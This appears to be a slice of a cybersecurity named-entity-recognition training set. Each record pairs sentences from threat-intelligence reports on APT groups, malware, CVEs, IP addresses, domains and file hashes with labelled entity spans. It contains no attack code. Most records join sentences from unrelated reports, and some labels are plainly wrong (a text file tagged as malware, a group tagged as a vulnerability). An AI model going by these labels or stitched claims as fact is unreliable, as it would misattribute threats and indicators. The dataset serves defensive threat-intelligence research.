{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "VULNERABILITY: zero-day": [[163, 171]], "ORGANIZATION: Symantec": [[208, 216]], "VULNERABILITY: CVE-2019-0703": [[217, 230]], "SYSTEM: Windows": [[257, 264]]}, "info": {"id": "cyberner_stix_train_001552", "source": "cyberner_stix_train"}}
{"text": "This script relays commands and output between the controller and the system . Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": {"THREAT_ACTOR: Buhtrap": [[79, 86]], "ORGANIZATION: bank": [[156, 160]]}, "info": {"id": "cyberner_stix_train_001553", "source": "cyberner_stix_train"}}
{"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8.26.21.117 srvhost.servehttp.com . The login , as mentioned above , was also designed to look legitimate .", "spans": {"THREAT_ACTOR: APT33": [[348, 353]], "IP_ADDRESS: 8.26.21.117": [[356, 367]], "DOMAIN: srvhost.servehttp.com": [[368, 389]]}, "info": {"id": "cyberner_stix_train_001554", "source": "cyberner_stix_train"}}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "MALWARE: Infostealer.Catchamas": [[296, 317]]}, "info": {"id": "cyberner_stix_train_001555", "source": "cyberner_stix_train"}}
{"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"MALWARE: Android version": [[4, 19]], "FILEPATH: Honeycomb": [[122, 131]], "TOOL: C2": [[301, 303]]}, "info": {"id": "cyberner_stix_train_001556", "source": "cyberner_stix_train"}}
{"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . Again , the attacker ’s intention appeared to be espionage . “ Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , ” explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab . GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": {"MALWARE: Agent Smith": [[0, 11]], "ORGANIZATION: Check Point": [[61, 72]], "TOOL: self-extracting RAR": [[235, 254]], "MALWARE: Loader.dll": [[316, 326]], "MALWARE: readme.txt": [[344, 354]], "THREAT_ACTOR: FinFisher": [[495, 504]], "THREAT_ACTOR: BlackOasis": [[566, 576]], "ORGANIZATION: Kaspersky Lab": [[743, 756]], "MALWARE: GoldenSpy": [[759, 768]], "MALWARE: GravityRAT": [[909, 919]], "MALWARE: HARDRAIN": [[992, 1000]], "MALWARE: HOPLIGHT": [[1059, 1067]], "MALWARE: Lazarus Group malware": [[1142, 1163]], "MALWARE: MacMa": [[1280, 1285]], "SYSTEM: C2 Communication.[21": [[1313, 1333]]}, "info": {"id": "cyberner_stix_train_001557", "source": "cyberner_stix_train"}}
{"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri . Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"THREAT_ACTOR: Flying Kitten": [[271, 284]], "THREAT_ACTOR: Rocket Kitten": [[288, 301]], "FILEPATH: wininet.dll": [[449, 460]], "THREAT_ACTOR: Winnti group": [[589, 601]], "MALWARE: previously unreported malware samples": [[619, 656]], "MALWARE: malware arsenal": [[702, 717]], "SYSTEM: registered domains": [[733, 751]]}, "info": {"id": "cyberner_stix_train_001558", "source": "cyberner_stix_train"}}
{"text": "For example , the Android malware that both deploy share the same strings of code for their decoding algorithm . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . According to the website , that domain supposedly belongs to a legitimate security company “ fully owned by the Russian Government ” ( sic . ) and having offices in “ Moscow , Saint Petersburg and Yekaterinburg ” , but the address says the company is located in Trump Tower , in New York . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple “ yes ” or “ no ” push notification .", "spans": {"SYSTEM: Android": [[18, 25]], "VULNERABILITY: Flash exploit": [[178, 191]], "VULNERABILITY: CVE-2016-4117": [[194, 207]], "ORGANIZATION: Russian Government": [[386, 404]], "ORGANIZATION: Trump Tower": [[536, 547]], "SYSTEM: Cisco Duo": [[728, 737]]}, "info": {"id": "cyberner_stix_train_001559", "source": "cyberner_stix_train"}}
{"text": "In addition to modules , CozyDuke can also be instructed to download and execute other , independent executables .", "spans": {"MALWARE: CozyDuke": [[25, 33]]}, "info": {"id": "cyberner_stix_train_001560", "source": "cyberner_stix_train"}}
{"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": {"MALWARE: TrickMo": [[28, 35]], "THREAT_ACTOR: threat groups": [[158, 171]], "VULNERABILITY: CVE-2018-0798": [[224, 237]], "MALWARE: PowerShell backdoor": [[363, 382]], "MALWARE: QUADAGENT": [[390, 399]], "THREAT_ACTOR: OilRig group": [[427, 439]], "ORGANIZATION: ClearSky Cyber Security": [[448, 471]], "ORGANIZATION: FireEye": [[476, 483]]}, "info": {"id": "cyberner_stix_train_001561", "source": "cyberner_stix_train"}}
{"text": "Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild .", "spans": {"THREAT_ACTOR: Outlaw": [[64, 70]]}, "info": {"id": "cyberner_stix_train_001562", "source": "cyberner_stix_train"}}
{"text": "This might allow a second attacker to install code of their choice – for example , their own Quasar RAT – on the original attacker ’s server .", "spans": {"MALWARE: Quasar RAT": [[93, 103]]}, "info": {"id": "cyberner_stix_train_001563", "source": "cyberner_stix_train"}}
{"text": "Please see the IOCs section for all app and package name combinations . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": {"ORGANIZATION: FireEye": [[72, 79]], "THREAT_ACTOR: APT41": [[135, 140]], "ORGANIZATION: video game industry": [[225, 244]], "MALWARE: HTTPBrowser": [[480, 491]], "MALWARE: Token Control": [[505, 518]], "THREAT_ACTOR: Wekby group": [[526, 537]], "TOOL: PDB": [[566, 569]]}, "info": {"id": "cyberner_stix_train_001564", "source": "cyberner_stix_train"}}
{"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank . SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"MALWARE: Desert Scorpion": [[47, 62]], "THREAT_ACTOR: attacker": [[451, 459]], "ORGANIZATION: Bangladesh Central Bank": [[500, 523]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[526, 560]], "FILEPATH: 9474e1517c98d4165300a49612888d16643efbf6": [[563, 603]]}, "info": {"id": "cyberner_stix_train_001565", "source": "cyberner_stix_train"}}
{"text": "Downeks uses third party websites to determine the external IP of the victim machine , possibly to determine victim location with GeoIP .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: third party websites": [[13, 33]], "TOOL: GeoIP": [[130, 135]]}, "info": {"id": "cyberner_stix_train_001566", "source": "cyberner_stix_train"}}
{"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploit vulnerabilities , and use social engineering techniques .", "spans": {"SYSTEM: Snapchat": [[68, 76]], "SYSTEM: Viber": [[81, 86]], "THREAT_ACTOR: APT10": [[89, 94]], "TOOL: WinRAR": [[152, 158]], "TOOL: cURL": [[234, 238]], "MALWARE: Daserf": [[319, 325]], "TOOL: multiple commodity": [[345, 363]], "TOOL: custom tools": [[368, 380]], "VULNERABILITY: vulnerabilities": [[391, 406]], "TOOL: social engineering techniques": [[417, 446]]}, "info": {"id": "cyberner_stix_train_001567", "source": "cyberner_stix_train"}}
{"text": "Change archive command After this activation cycle , the malware will start the collection of information activities and dissemination . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro . It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 . There are currently five behavioral - based rules defined by Apple .", "spans": {"ORGANIZATION: government": [[214, 224]], "TOOL: PowerShell scripts": [[251, 269]], "TOOL: Microsoft": [[283, 292]], "TOOL: Office Word": [[293, 304]], "DOMAIN: connect.bafunpda.xyz": [[364, 384]], "ORGANIZATION: Apple": [[465, 470]]}, "info": {"id": "cyberner_stix_train_001568", "source": "cyberner_stix_train"}}
{"text": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . The malware is not obfuscated so we easily found interesting strings here .", "spans": {"TOOL: MagicHound.Rollover": [[138, 157]], "MALWARE: malware": [[164, 171]]}, "info": {"id": "cyberner_stix_train_001569", "source": "cyberner_stix_train"}}
{"text": "While we now know that CozyDuke had been under development since at least the end of 2011 , it was not until the early days of July 2014 that the first large-scale CozyDuke campaign that we are aware of took place .", "spans": {"MALWARE: CozyDuke": [[23, 31], [164, 172]]}, "info": {"id": "cyberner_stix_train_001570", "source": "cyberner_stix_train"}}
{"text": "] cashnow [ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . If the immediate value for block comparison variable is not found in the flattened blocks , Threat intelligence is simply information about threats .", "spans": {"THREAT_ACTOR: attackers": [[51, 60]], "ORGANIZATION: banks": [[149, 154]], "ORGANIZATION: Threat intelligence": [[249, 268]]}, "info": {"id": "cyberner_stix_train_001571", "source": "cyberner_stix_train"}}
{"text": "Publicly available Bitly data reveals how many of the short links were clicked , likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page .", "spans": {"TOOL: Bitly": [[19, 24]], "TOOL: email": [[124, 129]], "TOOL: Gmail": [[164, 169]]}, "info": {"id": "cyberner_stix_train_001572", "source": "cyberner_stix_train"}}
{"text": "The fake website hosting server for the UnionCryptoTrader case will be described next .", "spans": {"TOOL: UnionCryptoTrader": [[40, 57]]}, "info": {"id": "cyberner_stix_train_001573", "source": "cyberner_stix_train"}}
{"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it ’ s highly likely the uyghurapps [ . They are a very , very persistent group , ” says Costin Raiu , who has been watching Winnti since 2011 . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"MALWARE: HenBox": [[63, 69]], "ORGANIZATION: Costin Raiu": [[161, 172]], "THREAT_ACTOR: Winnti": [[197, 203]], "THREAT_ACTOR: NUMBERED PANDA": [[326, 340]], "THREAT_ACTOR: Numbered Panda": [[343, 357]], "THREAT_ACTOR: DYNCALC": [[444, 451]], "THREAT_ACTOR: IXESHE": [[454, 460]], "THREAT_ACTOR: JOY RAT": [[463, 470]], "THREAT_ACTOR: APT-12": [[473, 479]]}, "info": {"id": "cyberner_stix_train_001574", "source": "cyberner_stix_train"}}
{"text": "Leveraging this feature , the malware developer can root the device using a range of vulnerabilities , well-known or zero-day . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia .", "spans": {"ORGANIZATION: Group-IB": [[128, 136]], "MALWARE: malicious Microsoft Word attachment": [[198, 233]], "THREAT_ACTOR: Cobalt": [[294, 300]]}, "info": {"id": "cyberner_stix_train_001575", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Venomous Bear has deployed malware to targets using several novel methods .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "THREAT_ACTOR: Venomous Bear": [[199, 212]]}, "info": {"id": "cyberner_stix_train_001576", "source": "cyberner_stix_train"}}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": {"MALWARE: Locky": [[43, 48]], "MALWARE: keyloggers": [[201, 211]], "MALWARE: Corkow": [[223, 229]], "SYSTEM: Windows": [[300, 307]]}, "info": {"id": "cyberner_stix_train_001577", "source": "cyberner_stix_train"}}
{"text": "FakeSpy first targeted South Korean and Japanese speakers . NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: NewsBeef": [[60, 68]], "THREAT_ACTOR: Gallmaker": [[303, 312]], "ORGANIZATION: defense": [[343, 350]], "ORGANIZATION: military": [[353, 361]], "ORGANIZATION: government sectors": [[368, 386]]}, "info": {"id": "cyberner_stix_train_001578", "source": "cyberner_stix_train"}}
{"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft ’s Equation Editor ( EQNEDT32 ) .", "spans": {"MALWARE: Bemstour": [[0, 8]], "TOOL: DoublePulsar backdoor": [[62, 83]], "FILEPATH: RTF files": [[138, 147]], "VULNERABILITY: CVE-2018-0798": [[168, 181]], "ORGANIZATION: Microsoft": [[199, 208]], "TOOL: Equation Editor": [[212, 227]], "TOOL: EQNEDT32": [[230, 238]]}, "info": {"id": "cyberner_stix_train_001579", "source": "cyberner_stix_train"}}
{"text": "Dynamic overlays When victims open up a targeted app , Marcher smoothly displays an overlay , a customized WebView , looks in its application preferences ( main_prefs.xml ) and decides which specified URL is needed for the targeted app . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures . Adobe issued a fix Monday to its users in the form of a software update . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": {"MALWARE: Marcher": [[55, 62]], "ORGANIZATION: Pension Service": [[291, 306]], "ORGANIZATION: Adobe": [[421, 426]], "THREAT_ACTOR: APT - C-36": [[610, 620]]}, "info": {"id": "cyberner_stix_train_001580", "source": "cyberner_stix_train"}}
{"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with the name null . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . The letter ends with “ Death to Israel ” and “ Humiliation and shame to the tyrant America ” 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"MALWARE: Exodus Two": [[154, 164]], "ORGANIZATION: government organizations": [[263, 287]], "ORGANIZATION: information technology services": [[301, 332]], "ORGANIZATION: government": [[342, 352]], "FILEPATH: 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc": [[481, 545]], "VULNERABILITY: previous work exposed publicly": [[713, 743]]}, "info": {"id": "cyberner_stix_train_001581", "source": "cyberner_stix_train"}}
{"text": "The email contains a Microsoft Office document as an attachment .", "spans": {"TOOL: email": [[4, 9]], "TOOL: Microsoft Office": [[21, 37]]}, "info": {"id": "cyberner_stix_train_001582", "source": "cyberner_stix_train"}}
{"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": {"SYSTEM: YouTube": [[0, 7], [47, 54]], "MALWARE: Pony DLL": [[281, 289]], "MALWARE: Vawtrak": [[294, 301]], "FILEPATH: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr": [[401, 480]]}, "info": {"id": "cyberner_stix_train_001583", "source": "cyberner_stix_train"}}
{"text": "A Google authorization token is a way to access the Google account and the related services of a user . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools . The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list . Table 1 : Malicious OT files Filename Hash Purpose a.iso Unknown Contains attacker ’s files lun.vbs 26e2a41f26ab885bf409982cb823ffd1", "spans": {"ORGANIZATION: Google": [[2, 8], [52, 58]], "THREAT_ACTOR: BRONZE BUTLER": [[104, 117]], "TOOL: Mimikatz": [[165, 173]], "TOOL: gsecdump": [[178, 186]], "TOOL: Daserf": [[207, 213]], "TOOL: Datper": [[218, 224]], "TOOL: mblock_t": [[268, 276], [393, 401]], "TOOL: optinsn_t : :f unc": [[328, 346]]}, "info": {"id": "cyberner_stix_train_001584", "source": "cyberner_stix_train"}}
{"text": "Top 20 countries targeted by Hummingbad/Shedun . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers . APT33 : 8.26.21.222 mynetwork.ddns.net . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"MALWARE: Hummingbad/Shedun": [[29, 46]], "THREAT_ACTOR: Lazarus Group": [[67, 80]], "TOOL: WannaCry": [[101, 109]], "ORGANIZATION: Microsoft customers": [[154, 173]], "THREAT_ACTOR: APT33": [[176, 181]], "IP_ADDRESS: 8.26.21.222": [[184, 195]], "DOMAIN: mynetwork.ddns.net": [[196, 214]], "TOOL: PIEHOP": [[244, 250]], "MALWARE: LIGHTWORK": [[316, 325]]}, "info": {"id": "cyberner_stix_train_001585", "source": "cyberner_stix_train"}}
{"text": "However , there is a need for broader focus across IoT in general , both from security teams at organizations that need to be more aware of these types of threats , as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks .", "spans": {"TOOL: IoT": [[51, 54], [181, 184]]}, "info": {"id": "cyberner_stix_train_001586", "source": "cyberner_stix_train"}}
{"text": "As we did not identify a pattern in the order which the commands are invoked , we believe the operators are executing them manually .", "spans": {}, "info": {"id": "cyberner_stix_train_001587", "source": "cyberner_stix_train"}}
{"text": "The authors of the malware didn’t appear to have spent any effort in concealing indicators or obfuscating code – the IP address with which it tries to communicate is hardcoded in clear-text inside the binary .", "spans": {}, "info": {"id": "cyberner_stix_train_001588", "source": "cyberner_stix_train"}}
{"text": "UPDATE – download APK file from C & C and install it . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and Exfiltration .", "spans": {"ORGANIZATION: FireEye 's DTI": [[87, 101]], "MALWARE: malicious attachments": [[141, 162]], "ORGANIZATION: banks": [[186, 191]], "THREAT_ACTOR: Leafminer": [[302, 311]]}, "info": {"id": "cyberner_stix_train_001589", "source": "cyberner_stix_train"}}
{"text": "Captured credentials are DES encrypted using the password \" 12345678 \" and are written to the log.txt file in the root directory .", "spans": {}, "info": {"id": "cyberner_stix_train_001590", "source": "cyberner_stix_train"}}
{"text": "The UnionCryptoTrader Windows version has the following window showing a price chart for several cryptocurrency exchanges .", "spans": {"TOOL: UnionCryptoTrader": [[4, 21]], "SYSTEM: Windows": [[22, 29]], "SYSTEM: window": [[56, 62]]}, "info": {"id": "cyberner_stix_train_001591", "source": "cyberner_stix_train"}}
{"text": "While cmd.exe is a console application , it still requires GUI like functionality and other support to interact with the operating system .", "spans": {"FILEPATH: cmd.exe": [[6, 13]], "TOOL: GUI": [[59, 62]]}, "info": {"id": "cyberner_stix_train_001592", "source": "cyberner_stix_train"}}
{"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis’": [[32, 43]], "VULNERABILITY: zero day": [[109, 117]], "FILEPATH: CONFUCIUS_B": [[124, 135]], "TOOL: Right-To-Left-Override": [[199, 221]], "TOOL: RTLO": [[224, 228]]}, "info": {"id": "cyberner_stix_train_001593", "source": "cyberner_stix_train"}}
{"text": "In the case of Artifact #1 , the name of the pipe is ahexec , computers over the network could access the pipe server by simply opening a file handle on \\ServerNamepipeahexec .", "spans": {}, "info": {"id": "cyberner_stix_train_001594", "source": "cyberner_stix_train"}}
{"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective . TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": {"THREAT_ACTOR: Confucius": [[19, 28]], "THREAT_ACTOR: Patchwork": [[33, 42]], "THREAT_ACTOR: TG-3390": [[282, 289]]}, "info": {"id": "cyberner_stix_train_001595", "source": "cyberner_stix_train"}}
{"text": "] website 107 [ . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . Persistence modules are based on scheduled tasks and system . The request header is included in the binary as follows", "spans": {"THREAT_ACTOR: Elfin group": [[22, 33]], "THREAT_ACTOR: APT33": [[40, 45]]}, "info": {"id": "cyberner_stix_train_001596", "source": "cyberner_stix_train"}}
{"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": {"MALWARE: KopiLuwak": [[21, 30]], "ORGANIZATION: IT departments": [[170, 184]]}, "info": {"id": "cyberner_stix_train_001597", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]]}, "info": {"id": "cyberner_stix_train_001598", "source": "cyberner_stix_train"}}
{"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Kessem .", "spans": {"MALWARE: malware": [[6, 13]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: private": [[105, 112]], "ORGANIZATION: organizations": [[113, 126]], "ORGANIZATION: Kessem": [[129, 135]]}, "info": {"id": "cyberner_stix_train_001599", "source": "cyberner_stix_train"}}
{"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category .", "spans": {"TOOL: PowerShell script": [[87, 104]], "MALWARE: DarkPulsar": [[156, 166]], "MALWARE: backdoor": [[237, 245]], "FILEPATH: sipauth32.tsp": [[254, 267]]}, "info": {"id": "cyberner_stix_train_001600", "source": "cyberner_stix_train"}}
{"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions . It is possible that CVE-2017-8759 was being used by additional actors . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware .", "spans": {"SYSTEM: Cybereason Mobile": [[0, 17]], "MALWARE: EventBot": [[26, 34]], "VULNERABILITY: CVE-2017-8759": [[102, 115]], "THREAT_ACTOR: actors": [[145, 151]], "ORGANIZATION: FireEye": [[276, 283]], "MALWARE: Poison Ivy malware family": [[341, 366]], "ORGANIZATION: Trend Micro3": [[385, 397]], "MALWARE: EvilGrab": [[429, 437]], "MALWARE: malware": [[438, 445]]}, "info": {"id": "cyberner_stix_train_001601", "source": "cyberner_stix_train"}}
{"text": "init . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": {"FILEPATH: 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494": [[7, 71]]}, "info": {"id": "cyberner_stix_train_001602", "source": "cyberner_stix_train"}}
{"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload . APT15 then used a tool known as RemoteExec . This remote access Trojan has the capability that allows an attacker to completely take control of the compromised . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": {"THREAT_ACTOR: APT15": [[118, 123]], "TOOL: RemoteExec": [[150, 160]], "MALWARE: Trojan": [[182, 188]], "VULNERABILITY: ProxyNotShell": [[417, 430]]}, "info": {"id": "cyberner_stix_train_001603", "source": "cyberner_stix_train"}}
{"text": "Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a “ whole kit ” of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via “ security through obscurity. ” They attempted to evade traffic inspection by encoding the code for the scanner with base-64 .", "spans": {"TOOL: C&C": [[20, 23]]}, "info": {"id": "cyberner_stix_train_001604", "source": "cyberner_stix_train"}}
{"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle WildFire properly classifies BBSRAT malware samples as malicious . The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor . We have discovered and analysed two previously unknown infector vectors that were used in the MiniDuke attacks .", "spans": {"MALWARE: Zen": [[103, 106]], "MALWARE: Bouncing Golf": [[214, 227]], "ORGANIZATION: WildFire": [[306, 314]], "TOOL: BBSRAT malware samples": [[335, 357]], "TOOL: Extensible Markup Language": [[394, 420]], "TOOL: XML": [[423, 426]], "THREAT_ACTOR: MiniDuke attacks": [[577, 593]]}, "info": {"id": "cyberner_stix_train_001605", "source": "cyberner_stix_train"}}
